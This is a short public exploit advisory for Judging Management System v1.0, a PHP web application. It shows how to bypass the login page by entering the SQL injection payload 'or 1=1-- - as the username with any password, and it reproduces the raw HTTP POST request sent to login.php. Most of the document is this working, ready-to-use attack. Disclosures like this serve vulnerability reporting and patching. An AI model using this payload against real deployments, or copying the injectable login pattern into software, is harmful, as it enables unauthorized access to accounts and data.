# Exploit Title: Judging Management System v1.0 - Authentication Bypass  
# Date: 12/11/2022  
# Exploit Author: Angelo Pio Amirante  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested on: Windows 10 on XAAMP server  
# Vulnerability: An attacker can bypass login page and access to dashboard page  
# Vulnerable file: login.php  
# Exploit:  
1) Go to: http://localhost/php-jms/index.php  
2) As username use this payload: 'or 1=1-- -  
3) Use random words for password  
POST /php-jms/login.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 37  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/php-jms/index.php  
Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1